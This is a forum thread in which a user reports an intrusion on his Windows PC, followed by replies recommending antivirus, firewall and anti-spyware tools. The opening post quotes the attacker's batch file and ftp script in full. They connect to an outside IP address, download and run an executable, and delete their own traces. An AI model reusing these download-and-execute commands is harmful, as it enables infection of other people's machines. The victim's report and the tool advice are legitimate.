cancel
Showing results for 
Search instead for 
Did you mean: 

ip address 84.92.42.133 is hacking

N/A

Hello

Windows security reached new lows yesterday when I discovered someone trying to execute the following bat file on my pc:

C:\WINDOWS\system32>type c.bat
@echo off
ftp -n -v -s:.pif
ntvhost.exe
del .pif
del /F c.bat
exit /y

The contents of the .pif file is as follows:
C:\WINDOWS\system32>type .pif
open 84.92.42.133 22041
user a a
binary
GET ntvhost.exe
bye

ntvhost.exe then is installed on my pc and runs from the registry. This is not good.
:x
6 REPLIES
N/A

I got a variant of this virus from 84.92.100.92 5895 so obviously other users are being affected too. The method remains the same with ntvhost.exe being ftp'd about. I installed Security task manager from http://www.neuber.com/taskmanager/regonline.html and this has helped me sort the problem out. Wink
N/A

Do you have an anti-virus and firewall?
N/A

Hello, I have since installed grisoft.com 's AVG free edition anti virus software. This was recommended to me by a colleague and so far I am very pleased with it. I'm simply using XP SP2 firewall. Got any alternatives?

:idea:
Community Veteran

Hi, I use the Zonealarm free firewall. It seems fine. I occassionally go to to the Shields Up site to check it and they haven't gotten through yet. Smiley

John
N/A

AVG Antivirus and other security tools

I am constantly amazed at how many people haven't got at least a basic anti-virus and spyware checker on their computers. Myself, I use AVG (though I have had minor problems recently with the update system on the latest version but it appears to be okay now), which is a FREE anti-virus program and better (and less obtrusive in my opinion) than Norton, which I have had on a free trial basis a couple of times (on different computers bundled in purchase).
Also, don't forget that this doesn't stop all SPYWARE, although the latest version seems to be better on this. To stop that, I use the popular (and again FREE) AdAware. To obtain these, just do an online search for those names and you'll receive a host of download sites.
I also have a belt-and-braces approach - I tend to use the Opera browser. Not only is this faster than several others I could mention, but it has tools to allow you to stop certain cookies from getting onto your computer in the first place. This can prevent some spam. You'll be surprised how many websites allow third-party cookies and all sorts of things onto your computer (some even try to put a DOZEN cookies of their own on there!).
N/A

Another problem I've found when looking at PCs for people is that they have installed virus software, such as Norton, but have let the subscription expire and just ignored the warnings. Then their virus definitions go out out of date and you can imagine...
Internet Explorer really is root of so many spyware problems - I use Firefox and get hardly any problems.